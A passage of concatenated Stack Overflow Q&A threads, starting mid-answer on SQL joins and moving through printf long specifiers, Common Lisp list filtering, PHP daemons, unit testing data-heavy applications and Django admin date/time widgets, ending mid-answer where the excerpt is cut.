[SOMETHING JOIN] cats ON humans.name = cats.human_name
ORDER BY humans.name;
An INNER JOIN returns all human-cat pairs.
Any human without a cat or cat without a human is excluded.
human_name | cat_name
------------+-----------
Abe | Axel
Jen | Jellybean
Jen | Juniper
A FULL OUTER JOIN returns all humans and all cats, with NULL if there is no match on either side.
human_name | cat_name
------------+-----------
Abe | Axel
Ann | [NULL]
Ben | [NULL]
Jen | Jellybean
Jen | Juniper
[NULL] | Bitty
A LEFT OUTER JOIN returns all humans (the left table).
Any human without a cat gets a NULL in the cat_name column.
Any cat without a human is excluded.
human_name | cat_name
------------+-----------
Abe | Axel
Ann | [NULL]
Ben | [NULL]
Jen | Jellybean
Jen | Juniper
A RIGHT OUTER JOIN returns all cats (the right table).
Any cat without a human gets a NULL in the human_name column.
Any human without a cat is excluded.
human_name | cat_name
------------+-----------
Abe | Axel
Jen | Jellybean
Jen | Juniper
[NULL] | Bitty
INNER vs OUTER
You can see that while an INNER JOIN gets only matching pairs, each kind of OUTER join includes some items without a match.
However, the actual words INNER and OUTER do not need to appear in queries:
*
*JOIN by itself implies INNER
*LEFT JOIN, RIGHT JOIN and OUTER JOIN all imply OUTER
A: The "outer" and "inner" are just optional elements, you are just dealing with two (three) kinds of joins. Inner joins (or what is the default when using only "join") is a join where only the elements that match the criteria are present on both tables.
The "outer" joins are the same as the inner join plus the elements of the left or right table that didn't match, adding nulls on all columns for the other table.
The full join is the inner plus the right and left joins.
In summary, if we have table A like this
idA
ColumnTableA
idB
1
Jonh
1
2
Sarah
1
3
Clark
2
4
Barbie
NULL
And table B like this:
idB
ColumnTableB
1
Connor
2
Kent
3
Spock
The inner join:
from tableA join tableB on tableA.idB = tableB.idB
idA
ColumnTableA
idB
ColumnTableB
1
Jonh
1
Connor
2
Sarah
1
Connor
3
Clark
2
Kent
Left outer join:
from tableA left join tableB on tableA.idB = tableB.idB
idA
ColumnTableA
idB
ColumnTableB
1
Jonh
1
Connor
2
Sarah
1
Connor
3
Clark
2
Kent
4
Barbie
NULL
NULL
Right outer join:
from tableA right join tableB on tableA.idB = tableB.idB
idA
ColumnTableA
idB
ColumnTableB
1
Jonh
1
Connor
2
Sarah
1
Connor
3
Clark
2
Kent
NULL
NULL
3
Spock
Full outer join:
from tableA full join tableB on tableA.idB = tableB.idB
idA
ColumnTableA
idB
ColumnTableB
1
Jonh
1
Connor
2
Sarah
1
Connor
3
Clark
2
Kent
4
Barbie
NULL
NULL
NULL
NULL
3
Spock
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38549",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5160"
} |
Q: What is the conversion specifier for printf that formats a long? The printf function takes an argument type, such as %d or %i for a signed int. However, I don't see anything for a long value.
A: On most platforms, long and int are the same size (32 bits). Still, it does have its own format specifier:
long n;
unsigned long un;
printf("%ld", n); // signed
printf("%lu", un); // unsigned
For 64 bits, you'd want a long long:
long long n;
unsigned long long un;
printf("%lld", n); // signed
printf("%llu", un); // unsigned
Oh, and of course, it's different in Windows:
printf("%l64d", n); // signed
printf("%l64u", un); // unsigned
Frequently, when I'm printing 64-bit values, I find it helpful to print them in hex (usually with numbers that big, they are pointers or bit fields).
unsigned long long n;
printf("0x%016llX", n); // "0x" followed by "0-padded", "16 char wide", "long long", "HEX with 0-9A-F"
will print:
0x00000000DEADBEEF
Btw, "long" doesn't mean that much anymore (on mainstream x64). "int" is the platform default int size, typically 32 bits. "long" is usually the same size. However, they have different portability semantics on older platforms (and modern embedded platforms!). "long long" is a 64-bit number and usually what people meant to use unless they really really knew what they were doing editing a piece of x-platform portable code. Even then, they probably would have used a macro instead to capture the semantic meaning of the type (eg uint64_t).
char c; // 8 bits
short s; // 16 bits
int i; // 32 bits (on modern platforms)
long l; // 32 bits
long long ll; // 64 bits
Back in the day, "int" was 16 bits. You'd think it would now be 64 bits, but no, that would have caused insane portability issues. Of course, even this is a simplification of the arcane and history-rich truth. See wiki:Integer
A: Put an l (lowercased letter L) directly before the specifier.
unsigned long n;
long m;
printf("%lu %ld", n, m);
A: I think you mean:
unsigned long n;
printf("%lu", n); // unsigned long
or
long n;
printf("%ld", n); // signed long
A: It depends, if you are referring to unsigned long the formatting character is "%lu". If you're referring to signed long the formatting character is "%ld".
A: %ld see printf reference on cplusplus.com
A: I needed to print unsigned long long, so I found this works:
unsigned long long n;
printf("%llu", n);
For all other combinations, I believe you use the table from the printf manual, taking the row, then column label for whatever type you're trying to print (as I do with printf("%llu", n) above).
A: I think to answer this question definitively would require knowing the compiler name and version that you are using and the platform (CPU type, OS etc.) that it is compiling for.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38561",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "595"
} |
Q: Common lisp idiom - is there a better way? I find myself doing this sort of thing all the time. I've been considering writing a macro/function to make this sort of thing easier, but it occurs to me that I'm probably reinventing the wheel.
Is there an existing function that will let me accomplish this same sort of thing more succinctly?
(defun remove-low-words (word-list)
"Return a list with words of insufficient score removed."
(let ((result nil))
(dolist (word word-list)
(when (good-enough-score-p word) (push word result)))
result))
A: The function you want is remove-if-not, which is built-in.
(defun remove-low-words (word-list)
(remove-if-not #'good-enough-score-p word-list))
If you feel like you are re-inventing something to do with lists, you probably are. Check the Hyperspec to see.
*
*The Hyperspec documentation on remove-if-not
*All sequence functions
*All list-specific functions
A: There are several built-in ways of doing this. One way would be:
(remove-if-not 'good-enough-score-p word-list)
And another:
(loop for word in word-list
when (good-enough-score-p word)
collect word)
And yet another:
(mapcan (lambda (word)
(when (good-enough-score-p word)
(list word)))
word-list)
Etc... There's also SERIES and Iterate. The Iterate version is identical to the LOOP version, but the SERIES version is interesting:
(collect (choose-if 'good-enough-score-p (scan word-list))))
So, yes, you're very likely to reinvent some wheel. :-)
A: There are a couple ways you can do this. First, and probably most easily, you can do it recursively.
(defun remove-low-words (word-list)
(if (good-enough-score-p (car word-list))
(list word (remove-low-words (cdr word-list)))
(remove-low-words (cdr word-list))))
You could also do it with mapcar and reduce, where the former can construct you a list with failing elements replaced by nil and the latter can be used to filter out the nil.
Either would be a good candidate for a "filter" macro or function that takes a list and returns the list filtered by some predicate.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38571",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Is .NET 3.5 SP1 Required on the server to use Dynamic Data? Is .NET 3.5 SP1 Required on the server to use Dynamic Data?
It looks like it generates a lot of code and therefore wouldn't require anything special on the server side. I ask because I would like to use it but the shared hosting provider my client is using only have 3.5 installed and not 3.5 SP1.
A: Yes, SP1 is required.
There are several bits of SP1 that Dynamic Data uses, notably the ASP.NET routing extensions and the new data annotation classes in System.ComponentModel.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38572",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Did Installing OneCare cause a "Generating user instances in SQL Server is disabled" error? Did Installing OneCare cause a "Generating user instances in SQL Server is disabled" error?
The only change that I've made to my computer is uninstalling AVG and installing the trial for Microsoft OneCare. Did OneCare change the SQLServer installation somehow?
This is a very "odd" question but is something I would post on EE in hopes of someone having had the same issue and giving their solution.
A: I would look more at the uninstalling of AVG as the culprit. OneCare does not care or even notice SQL Server instances as far as I can tell where as AVG does.
I would look into your SQL Server instance and check the jobs. One or more may have been added by AVG. You should remove them. You might also want to drop the AVG database. Just to be sure.
Note: I have never uninstalled AVG. I just have notice some of what it did to my Database when my SysAdmin installed it. Being an Accidental DBA I haven't had the time to properly evaluate it's actions.
A: The problem is your connection string. When using SQLExpress you can set it to run user instances so that each application has its own instance of SQL Server. Just set the option to false on your connections string and the problem should dissappear.
A: I didn't see anything odd in the event viewer or any db's for avg in SQLServer. btw I installed SQL server after AVG. it's curious anyway. I'll just make a VM and do a fresh install of SQLExpress so I can finish a few projects.
it's been over a year so it's time for the annual reformat and reinstall ;-)
A: @baldy
Thanks. I'll look at as well. Oddly enough though I didn't change the connection string at all. And when I created a new project and tried to drag-n-drop a DB into the LINQ to SQL diagram that error was raised then as well.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38589",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How do I make persistent network sockets on Unix in Ruby? I'd like to be able to write a ruby program that can restart without dropping it's socket connections.
A: This program gets Google's homepage and then when you pass it SIG_INT via Ctrl-C it restarts the program and reads the output of the homepage from the open socket with Google.
#!/usr/bin/ruby
#simple_connector.rb
require 'socket'
puts "Started."
if ARGV[0] == "restart"
sock = IO.open(ARGV[1].to_i)
puts sock.read
exit
else
sock = TCPSocket.new('google.com', 80)
sock.write("GET /\n")
end
Signal.trap("INT") do
puts "Restarting..."
exec("ruby simple_connector.rb restart #{sock.fileno}")
end
while true
sleep 1
end
A: You're talking about network sockets, not UNIX sockets I assume?
I'm not sure this suits your needs, but the way I would do it is by seperating the networking and logic part, and only restart the logic part, then reconnect the logic part to the networking part.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38592",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: What's the best way to keep a PHP script running as a daemon? What is the best way to keep a PHP script running as a daemon, and what's the best way to check if needs restarting.
I have some scripts that need to run 24/7 and for the most part I can run them using nohup. But if they go down, what's the best way to monitor it so it can be automatically restarted?
A: The most elegant solution is reactPHP.
A: If you can't use the (proper) init structure to do this (you're on shared hosting, etc.), use cron to run a script (it can be written in whatever language you like) every few minutes that checks to see if they're running, and restarts them if necessary.
A: Quick and dirty cron to restart your daemon:
* * * * * USER ps auxww | grep SCRIPTNAME > /dev/null || SCRIPTNAME
Replace USER with the user that the daemon runs as and SCRIPTNAME with the name of your script. Stick this in /etc/cron.d/restart_php_daemon. It should run every minute. Change the first * to */2 or */5 to run less frequently.
UPDATE
If you're putting this into your own crontab:
Run crontab -e and add:
* * * * * ps auxwww | grep SCRIPTNAME > /dev/null || SCRIPTNAME
A: We run our daemons by piping the output to mail.
php daemon.php | mail -s "daemon stopped" [email protected]
That way, when/if the daemon stops, it will send a mail, and we will be notified that way.
It still means manual restart of the daemons of course, but we'll know right away. Usually, if the daemons stopped, it means that there is something else that needs to be taken care of anyway, so that's usually ok.
A: I've had success with running a wget and sending the result to /dev/null on a shared server.
A: Daemon is a linux process that runs in background; apache or mysql are daemons.
In a linux environment, we can run a background program using cronjob, but it has some limitations, and in some scenarios it' s not a good idea.
For example, using cronjob, we can't control if the previously run has finished yet.
So often it's more convenient run a process as a daemon.
// Daemonize
$pid = pcntl_fork(); // parent gets the child PID and child gets 0
if($pid){ // if pid is not 0
// Only the parent will know the PID. Kids aren't self-aware
// Parent says goodbye!
print "Parent : " . getmypid() . " exiting\n";
exit();
}
print "Child : " . getmypid() . "\n";
The code above is taken from very good article about how to create a daemon in php. You can read this at link
A: I use a PHP-based script to read from a database and send emails out (using the PEAR Mail_Queue library). I run it from within a bash script and based on the returned result (from "exit $status;") either halt, sleep X seconds, or immediately restart. (I also put a check of the load average/sleep into the PHP script to avoid stressing the mail system).
If it was for a long-term daemon that had to be continually running, then I agree, it probably would not be the best thing to run this (though I have heard of some socket servers that did run successfully long term), however, PHP 5.3 does also now have improved garbage collection, and if the script is well written enough to not exit unplanned, then memory should be far less of a problem that before.
A: TBH, PHP probably isn't the best tool for this, really not what it was designed for. I've heard of memory leaks and other bad things happening when you try this. Also bear in mind PHP only has a finite amount of resource ids (for file handles, db connections ect) per execution of a script.
Be better of using something else, maybe python or perl, though I don't have any real experience writing these sorts of apps, but I do know PHP isn't right for what your trying to do.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38596",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: How do you unit test business applications? How are people unit testing their business applications? I've seen a lot of examples of unit testing with "simple to test" examples. Ex. a calculator. How are people unit testing data-heavy applications? How are you putting together your sample data? In many cases, data for one test may not work at all for another test which makes it hard to just have one test database?
Testing the data access portion of the code is fairly straightforward. It's testing out all the methods that work against the data that seem to be hard to test. For example, imagine a posting process where there is heavy data access to determine what is posted, numbers are adjusted, etc. There are a number of interim steps that occur (and need to be tested) along with tests afterwards that ensure the posting was successful. Some of those steps may actually be stored procedures.
In the past I've tried inserting the test data in a test database, then running the test, but honestly it's pretty painful to write this kind of code (and error prone). I've also tried just building a test database up front and rolling back the changes. That works OK but in a number of places you can't easily do this either (and many people would say that's integration testing; so be it, I still need to be able to test this somehow).
If the answer is that there isn't a nice way of handling this and it currently just sort of sucks, that would be useful to know as well.
Any thoughts, ideas, suggestions, or tips are appreciated.
A: My automated functional tests usually follow one of two patters:
*
*Database Connected Tests
*Mock Persistence Layer Tests
Database Connected Tests
When I have automated tests that are connected to the database, I usually make a single test database template that has enough data for all the tests. When the automated tests are run, a new test database is generated from the template for every test. The test database has to be constantly re-generated because test will often change the data. As tests are added, I usually append more data to the test database template.
There are some nice advantages to this testing method. The obvious advantage is that the tests also exercise your schema. Another advantage is that after setting up the initial tests, most new tests will be able to re-use the existing test data. This makes it easy to add more tests.
The downside is that the test database will become unwieldy. Because data will usually be added one test at time, it will be inconsistent and maybe even unrealistic. You will also end up cursing the person who setup the test database when there is a significant database schema change (which for me usually means I end up cursing myself).
This style of testing obviously doesn't work if you can't generate new test databases at will.
Mock Persistence Layer Tests
For this pattern, you create mock objects that live with the test cases. These mock objects intercept the calls to the database so that you can programmatically provide the appropriate results. Basically, when the code you're testing calls the findCustomerByName() method, your mock object is called instead of the persistence layer.
The nice thing about using mock object tests is that you can get very specific. Often times, there are execution paths that you simply can't reach in automated tests w/o mock objects. They also free you from maintaining a large, monolithic set of test data.
Another benefit is the lack of external dependencies. Because the mock objects simulate the persistence layer, your tests are no longer dependent on the database. This is often the deciding factor when choosing which pattern to choose. Mock objects seem to get more traction when dealing with legacy database systems or databases with stringent licensing terms.
The downside of mock objects is that they often result in a lot of extra test code. This isn't horrible because almost any amount of testing code is cheap when amortized over the number of times you run the test, but it can be annoying to have more test code then production code.
A: It depends on what you're testing. If you're testing a business logic component -- then its immaterial where the data is coming from and you'd probably use a mock or a hand rolled stub class that simulates the data access routine the component would have called in the wild. The only time I mess with the data access is when I'm actually testing the data access components themselves.
Even then I tend to open a DB transaction in the TestFixtureSetUp method (obviously this depends on what unit testing framework you might be using) and rollback the transaction at the end of the test suite TestFixtureTeardown.
A: Mocking Frameworks enable you to test your business objects.
Data Driven tests often end up becoming more of a intergration test than a unit test, they also carry with them the burden of managing the state of a data store pre and post execution of the test and the time taken in connecting and executing queries.
In general i would avoid doing unit tests that touch the database from your business objects. As for Testing your database you need a different stratergy.
That being said you can never totally get away from data driven testing only limiting the amout of tests that actually need to invoke your back end systems.
A: I have to second the comment by @Phil Bennett as I try to approach these integration tests with a rollback solution.
I have a very detailed post about integration testing your data access layer here
I show not only the sample data access class, base class, and sample DB transaction fixture class, but a full CRUD integration test w/ sample data shown. With this approach you don't need multiple test databases as you can control the data going in with each test and after the test is complete the transactions are all rolledback so your DB is clean.
About unit testing business logic inside your app, I would also second the comments by @Phil and @Mark because if you mock out all the dependencies your business object has, it becomes very simple to test your application logic one entity at a time ;)
Edit: So are you looking for one huge integration test that will verify everything from logic pre-data base / stored procedure run w/ logic and finally a verification on the way back? If so you could break this out into 2 steps:
*
*1 - Unit test the logic that happens before the data is pushed
into your data access code. For
example, if you have some code that
calculates some numbers based on
some properties -- write a test that
only checks to see if the logic for
this 1 function does what you asked
it to do. Mock out any dependancy
on the data access class so you can
ignore it for this test of the
application logic alone.
*2 - Integration test the logic that happens once you take your
manipulated data (from the previous
method we unit tested) and call the
appropriate stored procedure. Do
this inside a data specific testing
class so you can rollback after it's
completed. After your stored
procedure has run, do a query
against the database to get your
object now that we have done some
logic against the data and verify it
has the values you expected
(post-stored procedure logic /etc )
If you need an entry in your database for the stored procedure to run, simply insert that data before you run the sproc that has your logic inside it. For example, if you have a product that you need to test, it might require a supplier and category entry to insert so before you insert your product do a quick and dirty insert for a supplier and category so your product insert works as planned.
A: It sounds like you might be testing message based systems, or systems with highly parameterised interfaces, where there are large numbers of permutations of input data.
In general all the rules of standard unti testing still hold:
*
*Try to make the units being tested as small and discrete as possible.
*Try to make tests independant.
*Factor code to decouple dependencies.
*Use mocks and stubs to replace dependencies (like dataaccess)
Once this is done you will have removed a lot of the complexity from the tests, hopefully revealing good sets of unit tests, and simplifying the sample data.
A good methodology for then compiling sample data for test that still require complex input data is Orthogonal testing, or see here.
I've used that sort of method for generating test plans for WCF and BizTalk solutions where the permutations of input messages can create multiple possible execution paths.
A: For lots of different runs over the same logic but with different data you can use CSV, as many columns as you like for the input and the last for the output etc.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38598",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Using Django time/date widgets in custom form How can I use the nifty JavaScript date and time widgets that the default admin uses with my custom view?
I have looked through the Django forms documentation, and it briefly mentions django.contrib.admin.widgets, but I don't know how to use it?
Here is my template that I want it applied on.
<form action="." method="POST">
<table>
{% for f in form %}
<tr> <td> {{ f.name }}</td> <td>{{ f }}</td> </tr>
{% endfor %}
</table>
<input type="submit" name="submit" value="Add Product">
</form>
Also, I think it should be noted that I haven't really written a view up myself for this form, I am using a generic view. Here is the entry from the url.py:
(r'^admin/products/add/$', create_object, {'model': Product, 'post_save_redirect': ''}),
And I am relevantly new to the whole Django/MVC/MTV thing, so please go easy...
A: Complementing the answer by Carl Meyer, I would like to comment that you need to put that header in some valid block (inside the header) within your template.
{% block extra_head %}
<link rel="stylesheet" type="text/css" href="/media/admin/css/forms.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/base.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/global.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/widgets.css"/>
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="/media/admin/js/core.js"></script>
<script type="text/javascript" src="/media/admin/js/admin/RelatedObjectLookups.js"></script>
{{ form.media }}
{% endblock %}
A: For Django >= 2.0
Note: Using admin widgets for date-time fields is not a good idea as admin style-sheets can conflict with your site style-sheets in case you are using bootstrap or any other CSS frameworks. If you are building your site on bootstrap use my bootstrap-datepicker widget django-bootstrap-datepicker-plus.
Step 1: Add javascript-catalog URL to your project's (not app's) urls.py file.
from django.views.i18n import JavaScriptCatalog
urlpatterns = [
path('jsi18n', JavaScriptCatalog.as_view(), name='javascript-catalog'),
]
Step 2: Add required JavaScript/CSS resources to your template.
<script type="text/javascript" src="{% url 'javascript-catalog' %}"></script>
<script type="text/javascript" src="{% static '/admin/js/core.js' %}"></script>
<link rel="stylesheet" type="text/css" href="{% static '/admin/css/widgets.css' %}">
<style>.calendar>table>caption{caption-side:unset}</style><!--caption fix for bootstrap4-->
{{ form.media }} {# Form required JS and CSS #}
Step 3: Use admin widgets for date-time input fields in your forms.py.
from django.contrib.admin import widgets
from .models import Product
class ProductCreateForm(forms.ModelForm):
class Meta:
model = Product
fields = ['name', 'publish_date', 'publish_time', 'publish_datetime']
widgets = {
'publish_date': widgets.AdminDateWidget,
'publish_time': widgets.AdminTimeWidget,
'publish_datetime': widgets.AdminSplitDateTime,
}
A: As the solution is hackish, I think using your own date/time widget with some JavaScript is more feasible.
A: The below will also work as a last resort if the above failed
class PaymentsForm(forms.ModelForm):
class Meta:
model = Payments
def __init__(self, *args, **kwargs):
super(PaymentsForm, self).__init__(*args, **kwargs)
self.fields['date'].widget = SelectDateWidget()
Same as
class PaymentsForm(forms.ModelForm):
date = forms.DateField(widget=SelectDateWidget())
class Meta:
model = Payments
put this in your forms.py from django.forms.extras.widgets import SelectDateWidget
A: Here's another 2020 solution, inspired by @Sandeep's. Using the MinimalSplitDateTimeMultiWidget found in this gist, in our Form as below, we can use modern browser date and time selectors (via eg 'type': 'date'). We don't need any JS.
class EditAssessmentBaseForm(forms.ModelForm):
class Meta:
model = Assessment
fields = '__all__'
begin = DateTimeField(widget=MinimalSplitDateTimeMultiWidget())
A: Another simple solution for Django 3 (3.2) in 2021 ;) cause andyw's solution doesn't work in Firefox...
{% load static %}
{% block extrahead %}
{{ block.super }}
<script type="text/javascript" src="{% static 'admin/js/cancel.js' %}"></script>
<link rel="stylesheet" type="text/css" href="{% static 'admin/css/forms.css' %}">
<script src="{% url 'admin:jsi18n' %}"></script>
<script src="{% static 'admin/js/jquery.init.js' %}"></script>
<script src="{% static 'admin/js/core.js' %}"></script>
{{ form.media }}
{% endblock %}
<form action="" method="post">
{% csrf_token %}
{{ form.as_p }}
<input type="submit" value="Сохранить">
</form>
and you'll able to use your form.
example:
from django.contrib.admin import widgets
date_time = forms.SplitDateTimeField(widget=widgets.AdminSplitDateTime)
A: What about just assigning a class to your widget and then binding that class to the JQuery datepicker?
Django forms.py:
class MyForm(forms.ModelForm):
class Meta:
model = MyModel
def __init__(self, *args, **kwargs):
super(MyForm, self).__init__(*args, **kwargs)
self.fields['my_date_field'].widget.attrs['class'] = 'datepicker'
And some JavaScript for the template:
$(".datepicker").datepicker();
A: The growing complexity of this answer over time, and the many hacks required, probably ought to caution you against doing this at all. It's relying on undocumented internal implementation details of the admin, is likely to break again in future versions of Django, and is no easier to implement than just finding another JS calendar widget and using that.
That said, here's what you have to do if you're determined to make this work:
*
*Define your own ModelForm subclass for your model (best to put it in forms.py in your app), and tell it to use the AdminDateWidget / AdminTimeWidget / AdminSplitDateTime (replace 'mydate' etc with the proper field names from your model):
from django import forms
from my_app.models import Product
from django.contrib.admin import widgets
class ProductForm(forms.ModelForm):
class Meta:
model = Product
def __init__(self, *args, **kwargs):
super(ProductForm, self).__init__(*args, **kwargs)
self.fields['mydate'].widget = widgets.AdminDateWidget()
self.fields['mytime'].widget = widgets.AdminTimeWidget()
self.fields['mydatetime'].widget = widgets.AdminSplitDateTime()
*Change your URLconf to pass 'form_class': ProductForm instead of 'model': Product to the generic create_object view (that'll mean from my_app.forms import ProductForm instead of from my_app.models import Product, of course).
*In the head of your template, include {{ form.media }} to output the links to the Javascript files.
*And the hacky part: the admin date/time widgets presume that the i18n JS stuff has been loaded, and also require core.js, but don't provide either one automatically. So in your template above {{ form.media }} you'll need:
<script type="text/javascript" src="/my_admin/jsi18n/"></script>
<script type="text/javascript" src="/media/admin/js/core.js"></script>
You may also wish to use the following admin CSS (thanks Alex for mentioning this):
<link rel="stylesheet" type="text/css" href="/media/admin/css/forms.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/base.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/global.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/widgets.css"/>
This implies that Django's admin media (ADMIN_MEDIA_PREFIX) is at /media/admin/ - you can change that for your setup. Ideally you'd use a context processor to pass this values to your template instead of hardcoding it, but that's beyond the scope of this question.
This also requires that the URL /my_admin/jsi18n/ be manually wired up to the django.views.i18n.javascript_catalog view (or null_javascript_catalog if you aren't using I18N). You have to do this yourself instead of going through the admin application so it's accessible regardless of whether you're logged into the admin (thanks Jeremy for pointing this out). Sample code for your URLconf:
(r'^my_admin/jsi18n', 'django.views.i18n.javascript_catalog'),
Lastly, if you are using Django 1.2 or later, you need some additional code in your template to help the widgets find their media:
{% load adminmedia %} /* At the top of the template. */
/* In the head section of the template. */
<script type="text/javascript">
window.__admin_media_prefix__ = "{% filter escapejs %}{% admin_media_prefix %}{% endfilter %}";
</script>
Thanks lupefiasco for this addition.
A: I find myself referencing this post a lot, and found that the documentation defines a slightly less hacky way to override default widgets.
(No need to override the ModelForm's __init__ method)
However, you still need to wire your JS and CSS appropriately as Carl mentions.
forms.py
from django import forms
from my_app.models import Product
from django.contrib.admin import widgets
class ProductForm(forms.ModelForm):
mydate = forms.DateField(widget=widgets.AdminDateWidget)
mytime = forms.TimeField(widget=widgets.AdminTimeWidget)
mydatetime = forms.SplitDateTimeField(widget=widgets.AdminSplitDateTime)
class Meta:
model = Product
Reference Field Types to find the default form fields.
A: My head code for 1.4 version(some new and some removed)
{% block extrahead %}
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/forms.css"/>
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/base.css"/>
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/global.css"/>
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/widgets.css"/>
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/core.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/admin/RelatedObjectLookups.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/jquery.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/jquery.init.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/actions.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/calendar.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/admin/DateTimeShortcuts.js"></script>
{% endblock %}
A: Yep, I ended up overriding the /admin/jsi18n/ url.
Here's what I added in my urls.py. Make sure it's above the /admin/ url
(r'^admin/jsi18n', i18n_javascript),
And here is the i18n_javascript function I created.
from django.contrib import admin
def i18n_javascript(request):
return admin.site.i18n_javascript(request)
A: Starting in Django 1.2 RC1, if you're using the Django admin date picker widge trick, the following has to be added to your template, or you'll see the calendar icon url being referenced through "/missing-admin-media-prefix/".
{% load adminmedia %} /* At the top of the template. */
/* In the head section of the template. */
<script type="text/javascript">
window.__admin_media_prefix__ = "{% filter escapejs %}{% admin_media_prefix %}{% endfilter %}";
</script>
A: Updated solution and workaround for SplitDateTime with required=False:
forms.py
from django import forms
class SplitDateTimeJSField(forms.SplitDateTimeField):
def __init__(self, *args, **kwargs):
super(SplitDateTimeJSField, self).__init__(*args, **kwargs)
self.widget.widgets[0].attrs = {'class': 'vDateField'}
self.widget.widgets[1].attrs = {'class': 'vTimeField'}
class AnyFormOrModelForm(forms.Form):
date = forms.DateField(widget=forms.TextInput(attrs={'class':'vDateField'}))
time = forms.TimeField(widget=forms.TextInput(attrs={'class':'vTimeField'}))
timestamp = SplitDateTimeJSField(required=False,)
form.html
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="/admin_media/js/core.js"></script>
<script type="text/javascript" src="/admin_media/js/calendar.js"></script>
<script type="text/javascript" src="/admin_media/js/admin/DateTimeShortcuts.js"></script>
urls.py
(r'^admin/jsi18n/', 'django.views.i18n.javascript_catalog'),
A: I use this, it's great, but I have 2 problems with the template:
*
*I see the calendar icons twice for every filed in template.
*And for TimeField I have 'Enter a valid date.'
models.py
from django.db import models
name=models.CharField(max_length=100)
create_date=models.DateField(blank=True)
start_time=models.TimeField(blank=False)
end_time=models.TimeField(blank=False)
forms.py
from django import forms
from .models import Guide
from django.contrib.admin import widgets
class GuideForm(forms.ModelForm):
start_time = forms.DateField(widget=widgets.AdminTimeWidget)
end_time = forms.DateField(widget=widgets.AdminTimeWidget)
create_date = forms.DateField(widget=widgets.AdminDateWidget)
class Meta:
model=Guide
fields=['name','categorie','thumb']
A: In Django 10.
myproject/urls.py:
at the beginning of urlpatterns
from django.views.i18n import JavaScriptCatalog
urlpatterns = [
url(r'^jsi18n/$', JavaScriptCatalog.as_view(), name='javascript-catalog'),
.
.
.]
In my template.html:
{% load staticfiles %}
<script src="{% static "js/jquery-2.2.3.min.js" %}"></script>
<script src="{% static "js/bootstrap.min.js" %}"></script>
{# Loading internazionalization for js #}
{% load i18n admin_modify %}
<script type="text/javascript" src="{% url 'javascript-catalog' %}"></script>
<script type="text/javascript" src="{% static "/admin/js/jquery.init.js" %}"></script>
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/base.css" %}">
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/forms.css" %}">
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/login.css" %}">
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/widgets.css" %}">
<script type="text/javascript" src="{% static "/admin/js/core.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/SelectFilter2.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/admin/RelatedObjectLookups.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/actions.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/calendar.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/admin/DateTimeShortcuts.js" %}"></script>
A: My Django Setup : 1.11
Bootstrap: 3.3.7
Since none of the answers are completely clear, I am sharing my template code which presents no errors at all.
Top Half of template:
{% extends 'base.html' %}
{% load static %}
{% load i18n %}
{% block head %}
<title>Add Interview</title>
{% endblock %}
{% block content %}
<script type="text/javascript" src="{% url 'javascript-catalog' %}"></script>
<script type="text/javascript" src="{% static 'admin/js/core.js' %}"></script>
<link rel="stylesheet" type="text/css" href="{% static 'admin/css/forms.css' %}"/>
<link rel="stylesheet" type="text/css" href="{% static 'admin/css/widgets.css' %}"/>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" >
<script type="text/javascript" src="{% static 'js/jquery.js' %}"></script>
Bottom Half:
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="{% static 'admin/js/vendor/jquery/jquery.min.js' %}"></script>
<script type="text/javascript" src="{% static 'admin/js/jquery.init.js' %}"></script>
<script type="text/javascript" src="{% static 'admin/js/actions.min.js' %}"></script>
{% endblock %}
A: June 3, 2020 (All answers didn't worked, you can try this solution I used. Just for TimeField)
Use simple Charfield for time fields (start and end in this example) in forms.
forms.py
we can use Form or ModelForm here.
